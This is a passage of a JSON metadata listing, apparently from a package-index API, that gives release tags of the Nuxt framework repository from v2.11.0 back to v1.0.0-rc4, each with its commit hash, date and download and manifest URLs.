ste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.